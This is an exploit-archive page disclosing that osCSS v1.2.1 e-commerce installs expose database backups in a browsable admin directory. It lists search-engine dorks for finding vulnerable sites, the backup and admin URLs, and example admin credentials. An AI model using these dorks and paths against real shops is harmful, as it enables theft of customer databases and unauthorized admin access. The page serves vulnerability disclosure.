osCSS v1.2.1 Database Backups Disclosure

🗓️ 02 Mar 2010 00:00:00Reported by indoushkaType

zdt🔗 0day.today👁 28 Views

osCSS v1.2.1 has a vulnerability in database backups allowing unauthorized access.

========================================
osCSS v1.2.1 Database Backups Disclosure
========================================

========================================================================================                 
| # Title    : osCSS 1.2.1 Backups Vulnerability  
| # Author   : indoushka 
| # Dork     : Powered by osCSS                                                                                                             
| # Dork     : Index of /osCSS/admin/backups
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Mullti                                                                    
======================      Exploit By indoushka       =================================
# Exploit  : 
# osCSS, Open Source E-Commerce Solutions
# http://www.oscss.org
# Database Backup For osCSS Demo Shop
# Copyright (c) 2010 osCSS Demo Shop
 
http://127.0.0.1/osCSS/admin/backups/
 
http://127.0.0.1/osCSS/admin/ (to login)
 
exampl 2 login:
 
login:[email protected]
pass :admin



#  0day.today [2018-03-06]  #

02 Mar 2010 00:00Current

7.1High risk

Vulners AI Score7.1